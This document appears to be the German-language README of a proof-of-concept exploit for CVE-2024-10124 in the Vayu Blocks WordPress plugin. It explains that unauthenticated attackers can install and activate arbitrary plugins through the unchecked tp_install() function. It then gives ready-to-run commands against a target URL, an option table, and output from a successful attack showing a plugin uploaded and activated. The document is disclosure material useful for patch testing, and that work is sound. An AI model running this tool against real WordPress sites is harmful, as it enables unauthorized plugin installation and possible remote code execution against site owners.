
Proof-of-Concept-Exploit für CVE-2024-10124 im WordPress-Vayu-Blocks-Plugin, der eine unbefugte Installation und Aktivierung von Plugins ermöglicht, um möglicherweise eine Remote-Codeausführung zu erreichen.
Das Plugin Vayu Blocks – Gutenberg Blocks for WordPress & WooCommerce für WordPress ist anfällig für die nicht autorisierte Installation und Aktivierung beliebiger Plugins aufgrund einer fehlenden Berechtigungsprüfung in der Funktion tp_install() in allen Versionen bis einschließlich 1.1.1. Dies ermöglicht es nicht authentifizierten Angreifern, beliebige Plugins zu installieren und zu aktivieren, was ausgenutzt werden kann, um eine Remotecodeausführung zu erreichen, wenn ein weiteres verwundbares Plugin installiert und aktiviert ist. Diese Schwachstelle wurde in Version 1.1.1 teilweise behoben.
python CVE-2024-10124.py -u http://192.168.100.74/wordpress --check-version
Dies prüft die Version des Plugins vayu-blocks, um festzustellen, ob die Website verwundbar ist.
python CVE-2024-10124.py -u http://192.168.100.74/wordpress
Dadurch wird das Standard-Plugin hello-dolly installiert.
python CVE-2024-10124.py -u http://192.168.100.74/wordpress -p plugin_name
Dadurch wird das Plugin plugin_name auf der Zielwebsite installiert.
options:
-h, --help show this help message and exit
-u URL, --url URL Target URL (e.g., http://192.168.100.74/wordpress)
-p PLUGIN, --plugin PLUGIN
Plugin name (default: hello-dolly)
--check-version Check if the site is vulnerable based on plugin version
Response Status Code: 200
The plugin has been successfully uploaded and activated.
Response Content: "http:\/\/192.168.100.74\/wordpress"
Dieses Skript dient ausschließlich zu Bildungszwecken. Der Autor übernimmt keine Verantwortung für Schäden, die durch die missbräuchliche Verwendung dieses Skripts entstehen.
| 🔍 | Befehl | Beschreibung | Beispiel |
|---|
| 🌐 | -u or --url | Gibt die Ziel-URL für die WordPress-Website an. | -u http://192.168.100.74/wordpress |
| 🔒 | --check-version | Prüft, ob die Website basierend auf der Version verwundbar ist. | -u http://192.168.100.74/wordpress --check-version |
| ⚙️ | -p or --plugin | Gibt den Plugin-Namen an (Standard ist hello-dolly). | -u http://192.168.100.74/wordpress -p plugin_name |